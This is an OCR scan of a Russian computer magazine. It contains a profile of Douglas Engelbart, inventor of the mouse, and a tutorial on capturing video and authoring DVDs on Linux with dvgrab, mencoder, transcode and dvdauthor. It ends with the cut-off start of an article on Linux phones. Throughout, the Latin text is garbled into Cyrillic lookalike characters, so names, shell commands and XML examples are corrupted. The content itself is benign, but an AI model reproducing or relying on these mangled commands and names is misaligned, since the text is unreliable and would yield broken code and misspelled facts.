блоге на ЬотеІеззіпсЫзіпаи.ЫодзроКсот 
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МАРИЯ «МІРВІЫ.» НЕФЕДОВА 

/ мігтщакюоіск.кіі / 



Дуглас Энгельбарт. 



Трудно быть 



первым 



И7 



Имя: Дуглас Карл Энгельбарт 



Возраст: 83 года 



Заслуги: изобрел компьютерную мышь, гипертекст, помогал Рэю Томплисону в изобретении системы е-таіі, приложил 
руку к появлению символа (3. Пионер в изучении взаимодействия человека с машиной 
Место работы: директор собственной компании «Вооізігар Іпзіііиіе» 



□ БИОГРАФИЯ И ПРОЕКТЫ 

Бывает, люди становятся успешными благодаря простому стечению 
обстоятельств. Зарабатывают миллионы и даже миллиарды, поймав 
волну и вовремя воплотив в жизнь ту или иную идею. А бывают люди 
гениальные, про которых говорят — «талант не пропьешь». Да, они 
далеко не всегда миллиардеры и часто нам даже незнакомы их имена. 
Но, сами того не зная, мы пользуемся их изобретениями каждый день, 
не задумываясь о том, что когда-то какой-то безумец (будь уверен, окру- 
жающие думали о нем именно так) совершил открытие, без которого 
нашей сегодняшней действительности попросту не существовало бы. 
Именно к последней категории и относится герой нашего сегодняш- 
него профайла, великий изобретатель и гениальный ученый Дуглас 
Энгельбарт. 

Он родился 30 января далекого 1925 года. Сегодня ему 83 года, но он 
(тьфу-тьфу!) до сих пор жив и продолжает заниматься любимым делом 
(о котором — чуть позже). В детстве он был самым обычным мальчиком. 
Вырос на ферме в окрестностях Орегона, как все нормальные дети 
ходил в школу. Окончил ее в 1942 году, затем поступил в Орегонский 
университет (Огедоп Зіаіе ІІпіѵегзйу), нацелившись на диплом бакалав- 
ра в области электротехники. Диплом он получил, и университет окон- 
чил, но случилось это только в 1948, через три года после завершения 
Второй Мировой. 

А во время войны Дуглас служил радиотехником на военно-морской 
базе на Филиппинах. Именно в ту пору под руку ему попался весьма 
далекий от техники журнал АНапбс МопіЫу. А в нем была напечатана 
ныне давно ставшая культовой статья известного американского ученого 
в области ІТ и вычислительной техники Ванневара Буша «Как мы могли 
бы мыслить» (Аз ѴѴе МауТЫпк). В статье автор задавался вопросом, 
почему система хранения на «внешних носителях информации», будь 
то энциклопедии, библиотеки, картотеки, еіс, так отличается от струк- 
туры нашей памяти? Ведь у нас в голове все расположено далеко не 
в алфавитном порядке, человеческое мышление ассоциативно. Далее 
Буш описывал собственную гипотетическую фото-электромеханичес- 
кую машину Метех, место которой, скорее, в научно-фантастическом 
фильме, нежели в нашей реальности. Но статья буквально покорила 
Энгельбарта. Идеи ученого пришлись ему по душе. 

После войны и получения диплома Энгельбарта пригласили работать ни 
много, ни мало в лабораторию ЫАСА (да-да, будущее ЫА5А) по его пря- 
мой специальности — электротехником. Перебравшись в Калифорнию, 
где базировалась лаборатория, наш герой поступил в Беркли (ІІпіѵегзйу 



«На протяжении. 



как минимум, 

10 лет все были уве- 
рены, что я абсо- 
лютный псих» 



(о 50-60-х годах 
и своих идеях) 



о{ Саійогпіа аі Вегкеіеу), решив, что идеи о создании искусственного 
интеллекта требуют более серьезной подготовки. В 1955, получив сте- 
пень доктора наук все в той же сфере электро-вычислительной тех- 
ники, из университета Дуглас, тем не менее, не ушел. Вместо этого он 
уволился из ЫАСА и приступил к новой работе в качестве помощника 
профессора электротехники. Наконец, он оказался ближе к своей мечте 
— компьютерам. В том же 55-ом его привлекли к проекту САБОЮ, над 
которым уже не первый год кипела работа в университете. Разработку 
финансировали военные, а аббревиатура расшифровывалась, как 
Саійогпіа Оідйаі Сотрійег. Несложно понять, что в стенах Беркли разра- 
батывали суперкомпьютер. 

Однако новаторские и, мягко выражаясь, смелые идеи Энгельбарта не 
нашли отклика у коллег, да и военным нужен был скорее результат, чем 
странные эксперименты. Не отчаиваясь, Дуглас уже через год перебрал- 
ся в Стэнфордский НИИ (ЗіапЬгсІ РезеагсЬ Іпзійійе) и тогда же впервые 
попытался поставить свои наработки на коммерческую основу. В целом, 
за период с 1954 по 1958 годы он запатентовал 7 бистабильных газово- 
плазменных цифровых устройств и 12 магнитных девайсов. В частности, 
те, что родились в ходе подготовки к получению докторской степени. 
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Продать их он пытался больше года, но затея так и не увенчалась успе- 
хом. 

В то же время он активно помогал инженеру Хьюиту Крейну (НеѵѵіК 
Сгапе) в работе над магнитными компонентами ЭВМ, участвовал в 
фундаментальном исследовании феномена цифровых устройств и их 
потенциальной миниатюризации. Столь бурная деятельность не осталась 
незамеченной. В 1959 в Стэнфорде смиловались и позволили, наконец, 
Энгельбарту заиметь собственную лабораторию, проект и штат сотрудни- 
ков, в лучшие дни насчитывавший 47 человек. Стоит сказать, что людей 
доктор отбирал очень тщательно, и вся команда полностью разделяла 
его идеи. А чего еще ожидать от человека, который уверен, что «совер- 
шенствовать нужно не процесс, а участника процесса»? 

Последующие годы стали для Дугласа золотой порой. Работа в лаборато- 
рии Аидтепіабоп Резеагсб Сепіег, которую он возглавлял 20 лет, велась 
по многим направлениям. В частности, его команда создает рабочую 
среду Оп-І_іпе Зузіепп или же N15. Незадолго до этого Энгельбарт 
написал статью под названием «Концептуальная схема усиления чело- 
веческого интеллекта» (А СопсерЖаІ Ргатеѵѵогк !ог Же Аидтепіабоп о{ 
Мап'з ІпІеИесі]. В ней он описывал систему Н-І_АМ/Т, суть которой сво- 
дилась к тому, что в паре человек-машина пользователю отводится роль 
главного, творческой составляющей, а компьютер выступает в качестве 
помощника, симбиоза динамических компонентов, усиливая природный 
интеллект юзера. N1-5, разработку которой щедро финансировали ВВС 
и Министерство обороны США, стала воплощением этих идей в жизнь. 
Уже в то время (на дворе — 60-е!) в N1.5 присутствовали такие вещи, 
как система контекстной помощи, электронная почта, телеконференции, 
гипертекстовые ссылки, редактирование текста в онлайновом режиме 
и оконный интерфейс. По сути, это была первая в истории работающая 
гипертекстовая система. Мэйнфрейм лаборатории Энгельбарта был вто- 
рым компьютером, подключенным к сети АВРАЫеІ:, что начала зарож- 
даться как раз в те годы. На тот случай, если кто-то не знает, военный 
проект АВРАЫеІ: — прямой прародитель интернета. Команде доктора 
было поручено создание АПРАЫеІ Ыеіѵѵогк ІпЖгтабоп СепЖг. И именно 
как побочный эффект проекта ЫІ_5 на свет родился первый манипуля- 
тор типа мышь. 

Ее не разрабатывали специально, просто к оконной среде категорически 
не подходили уже существующие манипуляторы (джойстики, световые 
перья и прочие). В этой области было проведено целое исследование, 
итогом которого стала мышка. И хотя Энгельбарт в интервью не раз гово- 
рил, что понятия не имеет, откуда взялось это прозвище, и девайс, мол, 
сразу стал мышью, достаточно посмотреть на фото тех времен и все ста- 
новится ясно. Свое имя индикатор позиций х и у явно получил благодаря 
тому, что провод у него торчал сзади, то есть находился под запястьем 
пользователя, здорово смахивая на хвост. К слову сказать, курсор на 
экране команда Дугласа и вовсе прозвала «жуком» (Ьид), но этот термин не 
прижился. 

Первая «крыса», а точнее первый действующий прототип, созданный 
коллегой Энгельбарта — Биллом Инглишем (Вііі ЕпдІізЬ), появился в 
1964 году и представлял собой деревянную коробку ручной работы, с 
двумя перпендикулярными металлическими колесами внутри и кнопкой 
сверху. Широкой публике «грызуна» показали 9 декабря 1968, в ходе 
демонстрации возможностей N15 в Конвершн центре, Сан-Франциско. 
Патент на мышь Энгельбарт получил несколько лет спустя (в 1970). 
Казалось бы, после этого он должен был стать миллиардером, но все 
повернулось иначе. N^5 так и не получила широкого распространения, 
вероятно, идеи Дугласа показались военным чересчур новаторскими 
для того времени. К тому же, система была совсем недружественна и 




Первый прототип мыши. Настоящий зверь! 
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непроста в изучении, она требовала от пользователя выучить мнемони- 
ческий код, знать 5-битный двоичный код, чтобы нормально работать с 
аккордной клавиатурой, и много чего еще. Энгельбарт никогда не стре- 
мился создать простую, дружественную пользователю систему. И всегда 
придерживался мнения, что если речь идет о физически и психически 
здоровом человеке, значит совершенно не нужно все «разжевывать» и 
класть тому в рот. 

К сожалению, он не умел продавать свои идеи. За разработку мыши 
в 1968-м Энгельбарт получил скромную сумму, около $10.000, которую 
сразу внес в качестве первой платы за небольшой домик. А провал N15 
стал началом конца его лаборатории. Сотрудники стали разбегаться кто 
куда. В частности, разработку мыши Билл Инглиш продолжил уже под 
крылом компании Хегох РАПС. За счет того, что устройство новых мышей 
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отличалось от запатентованного Дугласом, с этим ничего нельзя было 
сделать. К тому же, в 1987 году патент истек, совсем чуть-чуть разминув- 
шись с моментом, когда мыши семимильными шагами зашагали по пла- 
нете стараниями компаний Арріе, МісгозоЛ и ІВМ. В интервью Энгельбарт 
говорил, что Стэнфордский НИИ совершенно не понимал ценности, кото- 
рую представлял патент на мышь. Доподлинно известно, что НИИ продал 
рріе лицензию на манипулятор по смешной цене — порядка $40.000. 
аким образом, 80-е стали для Дугласа периодом забвения. Пока другие 
зарабатывали на его идеях миллионы, он работал в мелких компаниях 
обычным служащим и посвящал себя семье. В довершение неудач у него 
сгорел дом, и в огне пропало все нажитое за годы, а сам Дуглас тяжело 
заболел. Он не любит говорить об этом периоде своей жизни и однажды 
даже назвал его «ссылкой в Сибирь». 

Ссылка выдалась длительной. Дела стали налаживаться лишь в конце 
80-х — начале 90-х, когда про Дугласа неожиданно вспомнили и решили 
признать его заслуги и вклад в развитие компьютерного прогресса. 

На текущий момент у Энгельбарта около 40 премий и наград. Вот только 
некоторые из них: 

1987 — пожизненная премия от журнала РС Мадазіпе. 

1990 — премия АСМ 5оЙѵѵаге Зузіет. 

1990 — пожизненная премия от Еіесігопіс Ыебл/огкіпд Аззосіабоп. 

1997 — премия Тьюринга. 

1997 — премия І_етеІзоп-МІТ. Награда учреждена крупным инвестором 
Джеромом Лемелсоном и МІТ (Маззасбизебъ Іпзіііиіе оі 1 ТесЬпоІоду). 
Самая крупная денежная награда США в области изобретательства 

- $500.000. 

1998 — Ѳеогде Р. ЗііЬіІг Сотриіег Ріопеег Аѵѵагб от Американского ком- 
пьютерного музея и Департамента компьютерных наук. 

2000 — Медаль технологий (высшая награда правительства США), вру- 
ченная лично Биллом Клинтоном. 

В 1988, устав от мытарств и немного поправив финансовое положение, 
Энгельбарт вместе с дочерью Кристиной основал предприятие Вооізігар 
Іпзбіібе, что можно перевести, как «Институт самосовершенствования». 
Проект некоммерческий, существует на деньги правительства и инвес- 
торов. Организация призвана объединить всех представителей сферы ІТ 
с целью формирования союзов и улучшения как своих организаций, так 
и самих себя. Кроме того, там ведется работа над Ореп Нурег-Ооситепі 
Эузіетз и активно развивается концепция коллективного ІО. Почитать 
обо всем этом можно на сайте института ( ѵѵѵѵѵѵ.ЬооізІхар.ога ). который 
работает и по сей день. 

В 2007 Центр коллективного интеллекта МІТ (термин «коллективный Ю» 
принадлежит Дугласу) объявил о начале проекта Наследие Энгельбарта 
(ЕпдеІЬагі І_едасу Рго)есі). Анонсировал это директор центра Том Мэлон 
(Тот Маіопе) в ходе личного визита Энгельбарта в МІТ. У Дугласа, нако- 
нец, появилась надежда на то, что его идеи пустили корни, нашли крышу 
над головой и двигаются вперед вместе с новым поколением. 

Сам он на сегодня имеет четырех взрослых детей (Кристина до сих пор 
возглавляет Вооігігар Іпзбіігіе), внуков и является одним из самых высо- 
кооплачиваемых сотрудников «мышиного магната» бодііесб. Про него 
не очень часто вспоминают, но, благодаря многочисленным премиям 
(многие из которых выражались в денежном эквиваленте), он получил 
возможность посвятить себя любимому делу, продвигать свою философию 
и заслуженно почивать на лаврах. И пусть размеры лавров не измеряются 
шести или семизначными числами, и пусть Дуглас так и не стал хорошим 
бизнесменом, мы все равно знаем, кто опередил свое время и первым 
придумал все то, что приписывают себе господа миллиардеры. А это уже 
измеряется совсем не в денежном эквиваленте. □-!! 




Вотон — «хвост», давший девайсу имя 
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ОѴО’шных 
дел мастер 



создаем ѵірео рур в бшцх 



Сегодня мы попробуем разобраться с ути- 
литами, которые помогут создать Ѵібео 
ОѴЭ с записями цифровой камеры, филь- 
мами и/или фотками. 




□ ЗАХВАТ ВИДЕО 

С цифровой камеры в иксахудобнее всего захватывать видео с помощью Кіпо. 
Чтобы результат можно было обработать в более мудреных редакторах (вроде 
Сіпеіегга], нужно захватывать материал в сыром виде в формате йѴ («Ебй 
-> Ргеіагепсез -> СарШге -> Ваѵѵ ОѴ»), потери качества в этом случае будут 
минимальны. Для экспорта файлов в подходящем для мастеринга формате в 
томже Кіпо просто выбирай профиль 5і:апбагб/ѴѴісІе5сгеепѴ0В. Любителям 
консоли могу порекомендовать бѵдгаЬ. Он умеет захватывать видео с РігеѴѴіге 
или ІІ5В-камер и сохранять в НАѴѴ, АѴІ, ОиіскТіте йѴ или ЗРЕ6. В некоторых 
дистрибутивах бѵдгаЬ устанавливается вместе с Кіпо, в ІІЬипіион идет отдель- 
ным пакетом: 

$ зисіо арб-деб іпзбаіі сІѵдгаЪ 
В простейшем случае достаточно ввести команду: 

$ сіѵдгаЬ 

Роипа АѴ/С аеѵісе ш.бЪ ШІБ 0х00804580М2(1823<1 
Сарбиге Збагбесі 

" сІѵдгаЪ- 0 01 . аѵі" : 20.34 МВ 143 бгатез бітесосіе 00:51:53.22 
сіабе 2007.08.07 01:04:44 



Начнется захват видеопотока с устройства/беѵ/гаѵѵі 394. Когда его нужно будет 
остановить, просто убиваем процесс нажатием <СбгІ-С>. На выходе получаем 
файл в формате йѴ с расширением АѴІ. 

$ бііе сІѵдгаЪ- 0 01 . аѵі 

сІѵдгаЪ-001 .аѵі : КІРР (Ііббіе-епсііап) сіаба, АѴІ, 720 x 576, 
25.00 брз, ѵісіео:, аисііо: ипсотргеззесі РСМ (збегео, 32000 
Н2) 

Иногда бѵдгаЬ ругается на отсутствие устройства /сіеѵ/гаѵѵі 394. Ничего страш- 
ного, если камера не определяется (лучше использовать дзсапЬиз), просто 
загрузи модульзисіо тос!ргоЬегаѵѵ1394. 

Описанный выше подход не всегда удобен. Файл с часовым фильмом получа- 
ется очень большой, и с ним могугбыть проблемы. Поэтому стоит использовать 
такую конструкцию: 

$ сіѵдгаЬ --бішезбашр --аибозрііб --зіге 1998 --сзіге 4400 
--сшіпсибзіге 10 ту_ѵісІео- 

Параметрйтезіаппруказываетна необходимостьдобавления метки времени к 
результирующему файлу. Это оченьудобно, когда гонишь кассеты оптом, а потом 
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собираешь их в ОѴй. Максимальный размер файла мы ограничили 1 998 Мб, это 
предел 1509660 в старых ядрах. Однако сегодня с этим проблем уже нет, поэтому 
можешь опустить данный параметр. Второе ограничение — сзі^е — указывает 
на предельный размер файлов, собранных в одну группу. Учитывая предстоящее 
перекодирование в МРЕ6, его также можно не использовать. Соответственно, 
стіпсиІБІіе показывает минимальный размер файла. Запустивтакую команду, 
на выходе мы получим набор авишекс именами ту_ѵібео-*. Так каку нас принят 
ста нда рт РАІ_, н ел и ш н и м будет доба в ить парам етр ' -іга тез 25 ' , о н укажет кол и - 
чество фреймов, которые нужно сохранить в новый файл при разделении. 

Для захвата через 115В с использованием ѵібео41іпих применяем команду: 



Теперь по подсказке длязахвата нажимаем клавишу <с>, воспроизведе- 
ние/пауза — <Пробел> и т.д. 

Для того чтобы создать ОѴО-диск при помощи бѵбаіЛбог (подробнее 
о нем ниже), на выходе нам нужно получить видеофайл в формате 
МРЕ6-2. Например, если установлен ѴІ_С, можно применить такую 
конструкцию: 

$ сІѵдгаЬ --богтаб сІѵ2 --бітезбатр — | ѵіс — : Ьетих=гаѵ7(іѵ -- 
по-зиЪ-аибосІебесб-бі1е " : зоиб^ібгапзсойеіѵсосіес^п^ѵ, ѵЪ= 
4096 , зса1е=1 ,асо<1 ес=а52 , аЬ=128 , сЬагте1з=2} :с!ир1ісабе{сІз 
б=сіізр1ау , сІзб=збсІ{ассезз=бі1е ,тих=бі1е , с!зб= " ~/ту_ѵісІео . 
трд"}}" — зоиб-ббтред-збгісб-гс 

Как вариант — можно использовать тепсобег: 

$ (ТѵдгаЬ - I тепсоЬег -об тред -тредорбз богтаб=сіѵсі: 
ѵазресб=4/3 : ѵбгатегабе=25 -згабе 48000 -обрз 25 -оѵс Іаѵс 
-оас Іаѵс -Іаѵсорбз ѵсо<іес ::: тред2ѵі(іео: ѵгс_Ъиб_зІ2е=1835 : 
кеуіпб=15 : ѵг^тахгабе^ЭЗОО : ѵЬібгабе=4900 :азресб=4/3 : 
асосІес=асЗ :аЪібгабе=192 -о ту_ѵісІео . тред 

Все, видео с камеры готово. 

0 ПОДГОТОВКА ВИДЕО 

Видео необязательно должно быть на камере. Если тебе вдругзахочется 
создать 0Ѵ0 из своей коллекции фильмов или фоток, то, покопавшись в Сети, 
ты найдешь кучу готовых скриптов, облегчающих эту процедуру, не говоря уже о 
графических надстройках. 

Для перекодирования в біпихтрадиционно используются Ігапзсобе и 
тепсобег. В первом случае процесс будет состоять из двух этапов: 

$ бгапзсоЬе -і ту_ѵісІео . аѵі -у тред2епс ,тр2епс -Е 9 -Е 
44100 -Ь 128 -о ту_ѵіс1ео 

Параметр ’-Р' для тред2епс означает профиль кодирования. Для разных 
утилит используются разные значения. Цифра 9 — 0Ѵ0 МРЕ6-2 (можно заме- 
нить буквой б). В результате в текущем каталоге мы получим два файла: *.т2ѵ 
(МРЕ6-2 видео) и *.тра (аудио). В скриптах обычно используется параметр 
’-Ѵ', который отвечаетза установку видеоформата УѴ1 2/1420. С некоторыми ко- 
деками он вызывает конфликт, в подобном случае попробуй изе_гдЬ‘. Теперь 
соединяем полученные файлы в МРЕ6: 

$ тріех -б 9 -5 800 -о ту_ѵісІео .трд ту_ѵіс3.ео .т2ѵ ту_ѵісіео . 
тра 

Другой вариант — использовать тепсобег. Общий пример может вы глядеть так: 

$ тепсоЬег -об тред -тредорбз богтаб=сІѵсІ: ѵазресб=4/3 : 
ѵбгатегабе=25 -згабе 48000 -обрз 25 -оѵс Іаѵс -оас Іаѵс 
-Іаѵсорбз ѵсосЗес=тред2ѵісіео:ѵгс_Ьиб_зІ2е=1835 :кеуіпб=15 : 
ѵгс_тахгабе=9800 : ѵЪібгабе=4900 :азресб=4/3 :асосіес=асЗ : 
аЪібгабе=192 ту_ѵіс1ео . аѵі -о ту_ѵісіео.тред 

Если утебя под рукой файлы в форматах\л/тѵ, тоѵ, азр ткѵ, одт.то преобразо- 
вать их в аѵі при помощи тепсобег проще простого: 



$ йѵдгаЬ -ѵ41 -іприб /Ьеѵ/ѵісЗеоІ 

Конечно, захватывать та ким образом не оченьудобно, хочется руководить 
процессом. Без проблем — используем интерактивный режим: 

$ ЬѵдгаЬ -і 

Соіпд іпбегасбіѵе. Ргезз '?' богЬеІр. 

д=диіб, р=р1ау, с=сарбиге, Езс=збор, Ь=геѵегзе, д=ЪаскнагсІ 
зсап, к=раизе, 1=богтл7агс1 зсап, а^геиіпЬ, 2 =базб богмагсі, 
0-9=бгіскр1ау , <зрасе>=р1ау/раизе 



$ тепсосіег -о оибриб_бі1е.аѵі -оѵс Іаѵс -Іаѵсорбз 
ѵЪібгабе=5000 : ѵЬд -ббоигсс БХ50 -оас рст -згабе 48000 - 
обрз 25 тоѵіе.тоѵ 

В ОѴО-МАСТЕРИНГ 

Процесс создания Ѵібео йѴй несколько отличается от записи обычного ОАТА- 
диска. Сначала подготавливается видеоматериал и выполняется деление 
на разделы, затем создается структура меню. Дополнительно в проект можно 
добавить субтитры, всякие украшения вроде интерактивных меню и кнопок, 
фоновых рисунков, звуковое сопровождение. После этого нужно сварганить 
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Интерактивный режим бѵдгаЬ 



ЮѵдгаЬ в работе! 



структуру ОѴО-диска, которая состоит из двух каталогов: А1Ю10_Т$ и 
ѴЮЕ0_Т5 (содержит ѴОВ-файлы, меню и субтитры]. 

Когда проектсоздан, остается записать его на диск. Основой всех про- 
грамм для ОѴО-мастеринга в І_іпих служитутилита сЫаиіНог (сМаиІІіог. 
збпеі], разработанная Скоттом Смитом. Создать с ее помощью готовый 
диск вполне реально, но на проект со сложными разветвленными меню и 
музыкальным оформлением у тебя уйдет куча времени. С другой стороны, 
все графические программы вроде КМебіаРасІогу, СЮѴОАиІбог и других 
являются лишь фронт-эндами к нему. 

Из подготовленных тред-файлов создаем файловую систему 0Ѵ0: 

$ сіѵсіаиббюг -о сіѵсі/ -б ту_ѵісІео .тред 

По окончании снова запускаем сіѵсі а и {бог, но уже для создания ТОС (ТаЫе о{ 
Сопіепіз): 

$ сіѵсіаиббюг -о сіѵсі/ -Т 

ШРО: сіѵсіаибііог сгеабіпд баЫе об сопбепбз 
ШРО: Зсаппіпд (іѵсІ/ѴІВЕО_ТЗ/ѴТЗ_01_0 . ІРО 

Вот в принципе и все, содержимое ОѴй у нас теперь есть, осталось создать 
150-образ изаписатьего на диск: 

$ ткізобз -сіѵсі-ѵісіео -о сіѵсі. ізо сіѵсі/ 

$ дгомізобз -сіѵсі-сотраб -2 /сІеѵ/сІѵ<і=сІѵсІ. ізо 

^ ФАЙЛ ОѴОАІЛНОК 

Конфигурационный файл, используемый утилитой сЫаиіЬог, представлен 
в формате ХМІ_. Здесь описывается все: видеофайлы, используемые в про- 
екте, ѴМ6М (Ѵібео МападегМепи) меню, кнопки, форматвидео (обычный 
или ѵѵібе) и прочее. Простейший файл, описывающий подключение одного 
фильма с двумя главами к проекту, имеет следующий вид: 

$ папо сІѵсІаиІНог.хтІ 

ссіѵсіаибііог (іезб="ВѴБ"> 

<ѵтдш /> 

<біб1езеб> 

<біб1ез> 

<рдс> 

<ѵоЪ бі1е="(іѵ(і_шоѵіе .трд" с1іарбегз=" 0 , 30 : 00 " /> 
</рдс> 

</біб1ез> 

</біб1езеб> 

</сіѵсіаиб1іог> 

Параметр ѵтдт отвечаетза основные настройки меню. Дляупрощения 
в этом поле ничего не используется, поэтому мы его сразу же и закрыли, 
оставив значения поумолчанию. Но настроекздесь предостаточно. Так, 



при помощи параметра Іоггпаі можно указать формат пізс или раі, за соот- 
ношение сторон отвечает азресб Что делать при переходе на ѵѵісіезсгееп, 
указывается с помощью одноименного параметра. Значениями могутбыть 
порапзсап, поІеНегбох или сгор. А еще здесь можно задать рисунок, музы- 
кальный или видеофайл, кнопки, команды. Тело проекта с меню и видео 
описывается параметрами, заключенными в Ііііезеб В проекте должен 
быть, как минимум, один Ііііезеб После объявления ІіНезеІ может следовать 
секция тепиз, в которой описано меню. Параметры совпадаютс ѵтдт. 

В подменю Ііііез описываются подключенные ресурсы, втерминологии 
автора рдсдгоир. Здесь может быть один видеофайл, до восьми звуковых 
файлов и 32 файла рисунков. Для удобства просмотра файлы разделяют- 
ся на главы, к которым можно быстро перейти, указав время в формате 
[[НН:]ММ:]55. В примере я поделил видео на две главы: сбар1егз= и 0, 30:00". 
Вторая глава, как видно, будет начинаться с 30-й минуты видео. Можно 
загнать и два мувика одной главой: 

<ѵоЪ бі1е= "ѵісіеоі .шрд" с1іарбегз=" 0 " /> 

<ѵоЪ бі1е="ѵісІео2 .шрд" /> 

Дополнительно предусмотрен параметр раизе, позволяющий указывать 
время задержки перед воспроизведением следующего файла. В качестве 
аргумента здесь может выступать цифра, показывающая время в секундах, 
или іпі, то есть неопределенная задержка. Команды, которые необходимо 
выполнить перед или по окончании воспроизведения, заключаются в конс- 
трукции «<рге> соттапсіз; </рге>» и «<розІ> соттапсіз; </розІ>». Список 
команд приведен в мане. Наиболее популярна «|итрТАР6ЕТ;», позволяю- 
щая перейти к выбранному разделу меню или видео. Например, следующие 
строки просто зациклят воспроизведение видео: 

<ѵоЬ бі1е= "ѵісіеоі .шрд" /> 

<розб> зшпр скарбег 1; </розб> 

^ ДОБАВЛЯЕМ СУБТИТРЫ 

Файлы «пререндеренных» и мягких субтитров могутбыть в форматах зиЬ, 
згі, зза, зті, гі, Іхб Отличаются они в основном возможностями форматиро- 
вания. Как пример: 

00:36:54,960 --> 00:36:59,476 
Приказ господина ПЖ — всем пацакам 
надеть намордники и радоваться . 

Самостоятельно извлечь субтитры в А5СІІ из ѵоЬ-файлов, принадлежащих 
первому фильму изтекущего каталога, можно, набрав следующие команды: 

$ саб ѵбз_01_?.ѵоЬ I бсехбгасб -х рзі -б ѵоЬ -а 0x20 I 
зиЬбіб1е2рдш -о шоѵіе_1 
$ рдш2бхб шоѵіе_1 

$ згббооі -з -і шоѵіе_1.згбх -о шу_пюѵіе_1 . згб 
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Н/Інтерфейс КМесІіаРасІоі 



ОеѴейе 



программа для мастеринга ОѴй 



УПІХОІ^ 



В качестве примечания необходимо уточнить, что фильмы могут соде ржать 
несколько субтитров, значение 0x20 соответствует первым, 0x21 — вторым 
итакдалее. 

Процесс этот долгий и на слабом компьютере времени займет порядочно. 

На выходе мы получим файл ту_тоѵіе_1 .зіі, содержащий субтитры. 
Программа зритих из пакета сЫаи^Ьог способна преобразовать текстовые 
субтитры в картинки, которые можно объединить с тред-файлом. В работе 
зритих обращается к каталогу -/.зритих, где должен находиться файл 
шрифтов. Копируем шрифтТшеТуре (.Ш), например АгіаІ.Ш, в этот каталоги 
создаем файл-описание. 

$папо5иЫіНе.хтІ 

<зиЬрісбигез> 

<збгеат> 

<бехбзиЪ бі1епате= "ту_шоѵіе_1 . згб " сЬагасбегзеб^'БТЁВ " 
бопбзІ2е="24 . 0 " бопб= "Агіаі . ббб " бюгігопбаі- 
а1ідптепб= " сепбег " 

ѵегбіса1-а1ідгшіепб= "Ьоббот" 1ебб-тагдіп=" 60 " гідііб- 
тагдіп= " 60 " 

бор-тагдіп="20 " Ьоббот-тагдіп="30 " зиЪбіб1е-брз="25 " 
тоѵіе-ѵ7Ісіі:]і="72 0" тоѵіе-Ъ.еідЪб= " 480 " /> 

</збгеат> 

</зиЬрісбигез> 

Теперь записываем субтитры в видеофайл и наслаждаемся результатом: 

$ зритих -з0 зиЪбібІе.хтІ < ѵісіео.трд > ѵісІео_ѵ7Іб]і_зиЪ. 
трд 

$ тріауег ѵісіео_ѵ7ІЫі_зиЬ.трд 
Посмотреть, как выглядят субтитры, можно, разобрав файл: 

$ зришжіих ѵі<Зео_ѵ7ІбЪ_зиЪ .трд 
В текущем каталоге получим большое количество рпд-файлов. 

^ ПРОГРАММА 0Ѵ0-5І.І0Е5Н0ѴѴ 

Есть еще один проект, которым я часто пользуюсь, — сІѵсІ-зІісІезИоѵѵ [ зТ. 
пеі/ргоіесіз/сіѵсі-зіісіезіюѵѵ ). С его помощью можно быстро и легко создавать 
йѴй из рисунков. Для установки в ІІЬипІи достаточно ввести зисіо арі-деі 
іпзІаІІсІѵсІ-зІісІезЬоѵѵ. Учитывая, что сіѵсі-зіісіезбоѵѵ представляет собой 
набор скриптов, его установка даже из исходных текстов не вызовет 
трудностей. Но перед инсталляцией необходимо позаботиться обо всех 
зависимостях — это сЫаиШог, МіредТооІз, ІтадеМадіск, Р^тред, кодеки 
Іате, ОддѴогЬіз и ІообАМЕ. 

В составе пакета сІѵсІ-зІісІезЬоѵѵ идет несколько утилит, каждая из которых 
отвечает за свой участок работы. Для начала следует собрать все фото- 
графии в один каталог. Кадрируем, подгоняем размеры, переворачиваем, 



чтобы они одинаково отображались на экране. Далее генерируем файл, 
содержащий описание изображений каталога, используемые эффекты и 
другие установки. 

$ <Зіг2з1ісІез1іо\л7 — о ~/<іѵ<3 -п 'Тібіе' -б 5 -з "Робо" -с 1 
/Ъоте/ЪоЪг/бобо/ 

Параметр п' указывает название проекта, оно будет выведено в заголов- 
ке. При помощи ’-б выставляем время демонстрации снимка. Используя 
з‘, кснимкам можно добавить подпись, '-с' позволяетустановить время 
действия эффектов перехода. Для сортировки файлов применяем Т' (вре- 
мя, дата, имя) и М ' (дата и имя). 

Полученный в результате файл Тібе. Іхі является входным для сМ-зІісІезЬоѵѵ. 

При желании его можно отредактировать вручную, открыв в любом текстовом 
редакторе. Кпримеру, можноустановитьперсональное время видимости для каж- 
дого снимка, подпись, эффекты перехода. Для упрощения можно использовать 
и заранее подготовленный файл с настройками — /бѵсІ-5Ііс1е5Ьоѵѵгс, в архиве 
имеется образец. Теперь полученный файл передаем утилите сіѵсі-зіісіезбоѵѵ: 

$ сіѵ(3-з1ісіез1іоѵ7 — б Тібіе.бхб 

Можно добавить и музыку, формат музыкального файла выбирай любой: трЗ, 
одд.ѵѵаѵ, тр2, асЗ, если только для него имеются кодеки в системе. И не бойся, 
что разрешение изображения больше, чем требует стандарт РАІ_, 720x576, оно 
будет подогнано без обрезки. Параметр ’-п‘ позволяет указать имена выход- 
ных файлов, поэтому можно использовать один итотже каталогдля несколь- 
ких проектов. Поумолчанию видеофайл генерируется в формате ЫТБС, для 
РАб используем параметр ’-р'. Некоторым не нравится черный цвет в качестве 
фона, особенно он бросается в глаза в вертикальных снимках, когда по краям 
видны большие черные полосы. Применив параметр Ь‘, можноуказать 
фоновое изображение, например іред-файл размером 720x576. 

Проверяем получившееся видео, запустив тріауег. Если все нормально, 
добавляем его в другой проект. Или создаем меню и структуру каталогов при 
помощи утилит, входящих в комплект сІѵсІ-зІісІезЬоѵѵ: 

$ <іѵс1-тепи -о <іѵсЗ_сотр1ебе -р -б 'Му_ВѴВ' -б 'ШБ' -б 
тепиі.хті -б тепи2.хт1 — е /Ьоте/ЬоЬг/Ьиббоп. дрд — п 

Здесь '-о' — выходной каталог; ’-б предназначен для создания меню; ’-Г 
указывает на файл, откуда будут браться параметры для меню (это может 
быть какХМб-файл, созданный нами раннее, таки готовый ѴОВ-файл); е' 
позволит добавить изображение, которое будет размещено слева от кнопок; 
’-п' указывает на подпись, которая будет выводиться в оглавлении. 

Из полезных опций также можно отметить '-іво' для генерирования 
готового 150-образа и *-с' для выполнения заданной Р05Т-команды после 
воспроизведения. 

Вот, собственно, и все. Надеюсь, теперь проблем с созданием своего Ѵісіео 
ОѴй в біпихутебя небудет.цс 
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МАЖОРНЫЙ ТУ КС 
НА МОБИЛЬНЫХ 
ПРОСТОРАХ а 

ХАЧИМ СОТОВЫЕ ТЕЛЕФОНЫ С І_ІМЦХ НА БОРТУ 




По прошествии нескольких лет «промышленной» эксплуатации Ілпих ворвался на мо- 
